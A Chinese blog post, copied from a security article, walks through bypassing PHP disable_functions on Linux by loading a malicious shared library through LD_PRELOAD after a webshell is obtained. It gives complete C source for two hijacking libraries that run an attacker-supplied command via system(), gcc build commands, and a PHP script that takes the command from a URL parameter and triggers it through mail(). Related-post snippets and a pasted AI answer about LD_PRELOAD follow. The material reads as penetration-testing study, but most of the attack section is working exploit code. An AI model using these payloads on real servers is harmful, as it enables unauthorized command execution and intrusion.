利用Linux LD_PRELOAD加载自定义的动态链接库Bypass disable_functions

最新推荐文章于 2022-12-02 11:36:12 发布
最新推荐文章于 2022-12-02 11:36:12 发布
阅读量514 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试 文章标签: 云安全 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zhanglichon666/article/details/111507003
本文介绍如何利用Linux LD_PRELOAD机制通过mail函数或构造函数劫持getuid函数,实现远程代码执行(RCE),包括具体条件、原理及实施步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

利用Linux LD_PRELOAD加载自定义的动态链接库Bypass disable_functions

事先声明,本文摘自 “酒仙桥六号部队” 的公众号 “奇怪的PHP知识增加了” 文章。本人本着学习的态度,跟着作者的思路自己操作了一遍,发现其中的缺陷,因此作此记录。如有冒犯/侵权,请私信,本人立马进行删除。

原文链接:https://mp.weixin.qq.com/s/BiBSwt8JO99JnCfK1pMjJw

熟悉Linux系统的同学们都清楚Linux LD_PRELOAD的作用,它的加载优先级最高,可以用来覆盖正常的函数库。对于此概念,原文已描述的很清楚,这里不赘述。进入主题:

0x01 利用mail函数劫持getuid()

利用条件
  1. 目标服务器是Linux操作系统;
  2. Linux系统安装并启用了sendmail程序;
  3. /usr/sbin/目录下存在sendmail软连接;
  4. error_log()和mail()函数没有被禁用;

(Tips:在渗透实战环境下,以上条件很多是无可得知的,所以只能进行盲打。)

利用原理

PHP的mail()函数在执行过程中会默认调用系统程序/usr/sbin/sendmail、/usr/sbin/postdrop,而/usr/sbin/sendmail会调用getuid()。那么我们通过LD_PRELOAD劫持getuid函数,然后调用mail函数执行我们生成的恶意函数库中的getuid函数。

利用方法

从实战渗透的角度出发,此时已获得webshell,但是无法执行命令,所以要先在自己的Linux VPS上创建attack.c文件并进行编译。attack.c文件内容如下:

#include <stdlib.h>  
#include <stdio.h>  
#include <string.h>  

int geteuid() {  
const char* cmdline = getenv("EVIL_CMDLINE");  
if (getenv("LD_PRELOAD") == NULL) { return 0; }  
unsetenv("LD_PRELOAD");  
system(cmdline);  
}

编译attack.c文件,生成attack.so动态链接库,用以下命令:

gcc -shared -fPIC attack.c -o attack.so

再创建getuid.php文件,内容如下:(内容我在原文的基础上做了少许删除,个人对输出的注释部分觉得冗余,所以删了。)

<?php
$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);
mail("", "", "", "");
echo "<p> <b>Display</b>: " . nl2br(file_get_contents($out_path))
. "</p>";
unlink($out_path);
?>

将attack.so、getuid.php文件上传至目标服务器
在这里插入图片描述
在这里插入图片描述可以看到attack.so文件没有执行权限,所以要修改其权限为0755。
在这里插入图片描述
访问 http://8.129.237.254/getuid.php?cmd=hostname&outpath=/tmp/yy&sopath=/www/admin/localhost_80/wwwroot/html/attack.so

在这里插入图片描述
(PS:师傅们不要乱来,之所以不打码,是因为这是我的测试服务器,我这就关机去。)

疑问一: outpath参数的值是/tmp/yy,yy文件夹是我在测试服务器上创建的,但是在实战渗透环境,无法执行命令的情况下是进行不了此操作的。如果这里的值更改为/tmp,则会报错 " unlink(/tmp): Permission denied in /www/admin/localhost_80/wwwroot/getuid.php on line 11 "

在这里插入图片描述
根据报错提示,是因为权限不足导致。那么又尝试将outpath参数的值改为WEB目录,则会报错 " unlink(/www/admin/localhost_80/wwwroot/): Is a directory in /www/admin/localhost_80/wwwroot/getuid.php on line 11 "

在这里插入图片描述
上面的不回显以及警告提示,我不知道是什么原因导致,希望知道的师傅们指点一下。截至目前的测试现象,个人认为此姿势在实战渗透环境下显得很鸡肋。

0x02 劫持启动函数

利用条件
  1. 目标服务器是Linux操作系统;
利用原理

上面的方法需要通过LD_PRELOAD劫持一个系统函数来实现RCE,如果sendmail函数被禁用了呢?如果能找到一个方式在加载时就执行代码,而不用考虑劫持某一系统函数,那我就完全可以不依赖 sendmail 了。而C++ 的构造函数就是如此。(摘自原文)

利用方法

同上,先在自己的Linux VPS上创建bypass_disablefunc.c文件并进行编译。bypass_disablefunc.c文件内容如下:

#define _GNU_SOURCE  

#include <stdlib.h>  
#include <stdio.h>  
#include <string.h>  

extern char** environ;  

__attribute__ ((__constructor__)) void preload (void)  
{  
// get command line options and arg  
const char* cmdline = getenv("EVIL_CMDLINE");  

// unset environment variable LD_PRELOAD.  
// unsetenv("LD_PRELOAD") no effect on some  
// distribution (e.g., centos), I need crafty trick.  
int i;  
for (i = 0; environ[i]; ++i) {  
if (strstr(environ[i], "LD_PRELOAD")) {  
environ[i][0] = '0';  
}  
}  

// executive command  
system(cmdline);  
}

编译bypass_disablefunc.c文件,生成bypass_disablefunc.so动态链接库,用以下命令:

gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc.so

再创建bypass_disablefunc.php文件,内容如下:(内容我在原文的基础上做了少许删除,个人对输出的注释部分觉得冗余,所以删了。)

<?php  
$cmd = $_GET["cmd"];  
$out_path = $_GET["outpath"];  
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";   
putenv("EVIL_CMDLINE=" . $evil_cmdline);  
$so_path = $_GET["sopath"];  
putenv("LD_PRELOAD=" . $so_path);  
mail("", "", "", "");  
echo "<p> <b>Display</b>: <br />" . nl2br(file_get_contents($out_path))
. "</p>";  
unlink($out_path);  
?>

将bypass_disablefunc.so、bypass_disablefunc.php文件上传至目标服务器,并修改bypass_disablefunc.so文件权限为0755。
在这里插入图片描述
访问 http://8.129.237.254/bypass_disablefunc.php?cmd=hostname&outpath=/tmp/yy&sopath=/www/admin/localhost_80/wwwroot/html/bypass_disablefunc.so

在这里插入图片描述
此姿势因为/tmp/yy目录的原因,个人同样觉得很鸡肋。毕竟在无法执行命令之前,无法创建到/tmp/yy目录。如果能创建/tmp/yy目录,也没必要做此操作了,还不如直接想办法提高权限。我不清楚这里为什么只有用/tmp/yy目录就可以正常回显,其它目录就不行。如果outpath的值设置为WEB目录也可以有回显,那么此姿势就不鸡肋了。望师傅指点一二。

此姿势原出处:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

CTFhub Bypass disable_function LD_PRELOAD
qq_41497476的博客
07-29 860
基本做完了基础题目,开始进入进阶的题了,第一道题给我整懵了。知识盲区 <!DOCTYPE html> <html> <head> <title>CTFHub Bypass disable_function —— LD_PRELOAD</title> </head> <body> <h1>CTFHub Bypass disable_function —— LD_PRELOAD</h1> <
CTFhub Bypass disable_function
qq_64703089的博客
08-08 727
这种关卡大部分需要蚁剑插件,插件真的能方便很多!!!
Bypass disable_function —— LD_PRELOAD
qq_42851946的博客
05-21 1713
Bypass disable_function —— LD_PRELOAD CTFHub-web技能树中的一道题 做这道题之前,先要稍微了解下: LD_PRELOAD: 是Linux系统的一个环境变量,它指定的*.so文件会在程序本身的*.so文件之前被加载。 putenv(): PHP函数,可以设置环境变量 mail(),error_log() PHP函数,在运行时会执行系统中的程序:sendmail 题目描述 已经拿到了shell,但是PHP配置中的disable_functions禁用了大部分常规的的
【PHP绕过】LD_PRELOAD bypass disable_functions
4ut15m's blog
03-03 1861
序 不能执行系统命令的webshell是没有灵魂的. LD_PRELOAD 众所周知,代码在编译成程序的时候有一个过程叫做链接-->将所引用的函数与变量链接到可执行程序中.编译过程中将所有的函数链接完毕叫做静态链接,而动态链接则是编译过程中不进行链接操作,在程序运行时再动态的载入函数.不管是静态链接还是动态链接,目的都很明确,载入函数. LD_PRELOAD是与载入函数相关的...
linux中使用LD_PRELOAD加载自定义函数
choumin的专栏
09-04 1201
linux 中可以通过设置 LD_PRELOAD 环境变量来优先加载指定的动态,详情请见:https://www.man7.org/linux/man-pages/man8/ld.so.8.html。下面就记录一下它的基本用法——使用 LD_PRELOAD 旁路 libc 中的 memcmp。 1)实现自己的 memcmp(为提高效率,先以 8 字节块为大小进行比较,失配后进行逐字节比较) memcmp.c 的内容如下: #include &lt...
蚁剑的能绕过disable_functions的插件
06-21
蚁剑的能绕过disable_functions的插件,插件无法下载问题
利用ld_preload方式绕过disable_functions
Jiajiajiang_的博客
08-06 1259
参考链接:https://github.com/l3m0n/Bypass_Disable_functions_Shell 连了菜刀无法执行命令系列。 去看phpinfo(别问我怎么看,你都能上传一句话了,phpinfo不是问题 好家伙!禁用了这么多函数,这可咋整 行我去找方法了, 试过了pcntl_exec的方法,没有成功,来用ld_preload绕过(mail 啥也别说了,上马 ...
无需sendmail:巧用LD_PRELOAD突破disable_functions
Coisini的博客
12-03 1104
摘要:千辛万苦拿到的 webshell 居然无法执行系统命令,怀疑服务端 disable_functions 禁用了命令执行函数,通过环境变量 LD_PRELOAD 劫持系统函数,却又发现目标根本没安装 sendmail,无法执行命令的 webshell 是无意义的,看我如何突破! | 半月前逛“已黑网站列表”时复审一小电商网站,“列表”中并未告知漏洞详情,简单浏览了下功能,只有注册、登录、下单...
过宝塔的disable_functions
不想当脚本小子的脚本小子
06-09 924
宝塔默认限制了以下危险函数,这里我们可以尝试使用以下3个项目来绕过,由于putenv()函数没有被限制,所以最终可以通过LD_PRELOAD & putenv()绕过disable_functions执行系统命令。 https://github.com/mm0r1/exploits/ https://github.com/l3m0n/Bypass_Disable_functions_Shell https://github.com/yangyangwithgnu/bypas
Bypass disable_function【CTFHUB】
D.MIND 的博客
05-12 1597
LD_PRELOADLinux下的环境变量 它的本意是,允许程序优先加载指定的动态。这样能够选择不同的动态中的相同的函数或者变量。 使用场景是:当使用别人提供的动态,发现其中某些函数实现不合理。但不能要求别人为你修改源代码并重新生成动态。在这种情况下,使用LD_PRELOAD可以使用自定义的代码替换别人动态中的部分代码。 利用环境变量 LD_PRELOAD 劫持系统函数,让外部程序加载恶意 *.so,达到执行系统命令的效果。 利用条件: 1. 能够上传自己的.so文件 2. 能够控制环境变量
cmd编译可以通过执行没有结果_通过LD_PRELOAD绕过disable_functions
weixin_39612720的博客
11-21 121
原创: Mr.zhang合天智汇原创投稿活动:重金悬赏 | 合天原创投稿等你来0x00 前言前段时间碰到拿到shell以后限制了basedir并且无法执行命令的情况,解决办法是上传恶意的.so文件,并通过设置LD_PRELOAD,然后调用新进程来加载恶意.so文件,达到绕过的效果。当时做这道题目的时候是跟着别人的题解直接套的(一道疯狂bypass的题目),属于一知半解的状态,比赛结束之后又耽搁了一...
Bypass_disable_functions via LD_PRELOAD
qq_45521281的博客
04-22 1273
千辛万苦拿到的 webshell 居然无法执行系统命令:
CTF Linux 命令执行常规bypass
weixin_30892889的博客
09-11 1668
截断符 常见的RCE的形式是给一个ping的命令执行,只需要输入ip,然后返回ping ip的输出信息 常见的用来截断的符号 & && ; | || windows或linux下: command1 && command2 先执行command1后执行command2 command1 | command2 只执行c...
Linux LD_PRELOAD动态链接库劫持
SHELLCODE_8BIT的博客
12-02 867
【代码】LD_PRELOAD
php函数禁用提权,[原创]WEB安全第八章实战篇02 绕过Bypass disable_functions 提权
weixin_36343353的博客
03-26 412
WEB安全第八章实战篇02 绕过Bypass disable_functions 提权1.环境宝塔linux主机主机系统类型 centos php版本 5.42.禁用函数禁用这些执行命令的函数,导致无法执行命令。3.绕过方法劫持函数 劫持共享对象 执行命令cc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so -ldl...
linux漏洞分析入门笔记-bypass_PIE
weixin_30399155的博客
12-19 283
ubuntu 16.04 IDA 7.0 docker 0x00:漏洞分析 1.ASLR的是操作系统的功能选项,作用于executable(ELF)装入内存运行时,因而只能随机化stack、heap、libraries的基址;而PIE(Position Independent Executables)是编译器(gcc,..)功能选项(-fPIE),作用于excutable编译过程,可将其理...
使用LD_PreloadLinux权限升级技巧
weixin_30586085的博客
03-10 1053
0x00 前言 共享是程序在启动时加载。正确安装共享后,之后启动的所有程序将自动使用新的共享。 0x01 共享名称 每个共享都有一个名为soname的特殊名称。soname有前缀lib,的后缀名为.so,后跟句号和版本号。 动态链接器可以通过运行一些动态链接的程序或共享对象来间接运行。程序ld.so和ld linux.so*查找并加载程序所需的共享对象(共享),准备...
Linux动态链接库 .so 的生成和使用
freezing point·J
11-18 2169
 创建 .so 文件跟一般的ELF文件的生成相似,不同之处在于:1、添加 -fPIC -shared作为gcc的选项;其中:PIC表示 Position Independent Code,用于指示gcc将.c文件编译为目标代码.o;-shared用户指示gcc连接器输出T类型的导出符号表,有时候也生成弱连接W类型的导出符号),不用该标志外部程序无法连接。2、输出文件名附加lib前缀,附加.
mysql提权方式linux_Linux提权的几种常用方式
weixin_32631729的博客
01-28 2029
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,...
LD_PRELOAD是不是只能劫持libc
最新发布
07-02
<think>首先,用户的问题是:&ldquo;我想询问LD_PRELOAD是否只能用于劫持libc请问LD_PRELOAD是否仅能劫持 libc”。我需要基于提供的引用和系统级指令来回答。关键点是:LD_PRELOAD是否只能用于劫持libc?用户的问题焦点是是否仅限于 libc。回顾引用: -引用[1]:LD_PRELOAD用于动态加载,优先级最高。加载顺序:LD_PRELOAD> LD_LIBRARY_PATH >/etc/ld.so.cache >/lib> /usr/lib。 -引用[2]:如果 LD_PRELOAD指定的中定义了与标准(如 libc)同名的函数,程序会优先使用LD_PRELOAD中的函数。这可以用来修改或扩展程序的行为。-引用[3]:LD_PRELOAD允许在程序启动前加载动态链接库,用于调试或测试不同版本的。 -引用[4]: LD_PRELOAD劫持允许在自定义动态链接库中装入恶意函数。-引用[5]:程序的链接类型:静态链接、装入时动态链接、运行时动态链接。 从引用[2]中明确提到&ldquo;标准(如libc)”,这表明 libc是一个常见例子,但不是唯一的。引用[2]说&ldquo;如libc”,意思是&ldquo;例如libc”,暗示它可以是其他。 引用[4]提到&ldquo;装入恶意函数”,没有指定必须是libc。引用[3]讨论使用LD_PRELOAD加载任何动态,无论是调试版本还是不同版本,没有限制为 libc。所以,LD_PRELOAD可以用于劫持任何动态,不仅仅是libc。它优先加载指定的,如果该中有与任何其他同名的函数,就会覆盖那些函数。因此,回答应该是:不,LD_PRELOAD不仅可以用于劫持libc,它可以用于劫持任何动态的函数。现在,结构化回答: 1. **系统级指令**:-所有行内数学表达式用 $...$,但这里没有数学内容,所以可能不需要。-独立公式用$$...$$,但同样,没有数学。-LaTeX语法正确:确保如果使用数学符号,格式正确。-使用中文回答。-生成相关问题:在回答末尾添加相关问题。-引用段落末尾添加引用标识,如[^1]。2. **回答结构**:-清晰、逐步解决问题。-保证真实可靠:基于提供的引用。-参考站内引用:在回答中引用相关部分。 步骤: -先直接回答问题:LD_PRELOAD不仅限于劫持 libc。-解释原理:LD_PRELOAD允许优先加载任何动态,覆盖同名函数。-提供例子:基于引用,如用于调试、测试或安全劫持。-添加引用:在关键点后添加引用标识。-结尾生成相关问题。相关问题:基于主题,如LD_PRELOAD的其他用途、安全风险、如何防止劫持等。相关问题示例: 1. LD_PRELOAD有哪些常见的使用场景?2.如何防止 LD_PRELOAD劫持?3.LD_PRELOAD在调试中的作用是什么? 完整回答框架: 1.引言:直接回应用户问题。2.解释:LD_PRELOAD的工作原理。3.澄清:是否仅限于 libc。4.例子:其他的劫持可能性。 5.引用:整合引用。6.相关问题。确保中文。</think>### LD_PRELOAD 是否仅能劫持 libc LD_PRELOAD 是一个 Linux 环境变量,用于在程序启动前优先加载指定的动态链接库(shared library)。它通过覆盖函数调用来实现&ldquo;劫持”行为,但**并非仅限于劫持 libc **。以下我将逐步解释原理、适用范围和实际例子,确保回答基于可靠的引用信息。 #### 1. **LD_PRELOAD 的工作原理** - LD_PRELOAD 允许你指定一个或多个动态链接库(例如 `mylib.so`),这些会在程序加载时优先于其他(如标准 libc)被加载[^1]。 - 当中包含与目标程序(或任何依赖)同名的函数时,LD_PRELOAD 中的函数会覆盖原始函数,从而实现劫持[^2]。这适用于任何动态,而不仅仅是 libc。 - 例如,如果你创建了一个自定义,其中定义了 `printf` 函数(libc 中的函数),或 `custom_function`(其他中的函数),LD_PRELOAD 都能强制程序使用你的版本[^2][^3]。 #### 2. **是否仅限于 libc ?** - **不,LD_PRELOAD 可以劫持任何动态的函数**。libc 是常见的劫持目标,因为它包含许多基础函数(如 `malloc`、`printf`),但 LD_PRELOAD 的机制是通用的: - 它可以劫持 libc 的函数,如覆盖 `open()` 或 `read()`[^2]。 - 同样,它可以劫持第三方的函数,例如 OpenSSL 中的 `SSL_write()`,或自定义中的函数[^3][^4]。 - 引用[2]提到&ldquo;标准(如 libc)”,这里的&ldquo;如”表示 libc 只是一个例子,并非限制。实际上,LD_PRELOAD 的劫持能力取决于自定义是否定义了与目标程序或依赖同名的函数[^2][^4]。 #### 3. **实际使用场景和例子** - **调试与测试**:开发者可以创建一个调试版本的(如 `debug_ssl.so`),覆盖 OpenSSL 的函数,以记录日志或模拟错误,而不影响原始程序[^3]。 - **安全劫持**:攻击者可能劫持非 libc ,例如覆盖图形(如 GTK)的函数来窃取用户输入[^4]。 - **性能优化**:在科学计算中,劫持数学(如 BLAS)的函数,以替换为优化版本[^3]。 - 示例命令: ```bash LD_PRELOAD=/path/to/custom_lib.so ./target_program ``` 这里,`custom_lib.so` 可以针对 libc、OpenSSL 或其他任何进行劫持[^3][^4]。 #### 4. **注意事项** - 劫持非 libc 时,需确保自定义函数的签名(参数和返回值)与原始函数完全一致,否则可能导致程序崩溃[^2][^3]。 - LD_PRELOAD 的优先级最高,但可能被安全机制(如 SELinux)限制,以防止恶意劫持[^1][^4]。 - 引用[5]提到动态链接的类型(如运行时动态链接),LD_PRELOAD 属于&ldquo;装入时动态链接”,这进一步说明其通用性,不限于特定[^5]。 总之,LD_PRELOAD 是一个强大的工具,可用于劫持任何动态的函数,而不仅限于 libc。正确使用时,它支持合法场景如调试和优化;但滥用可能导致安全风险[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值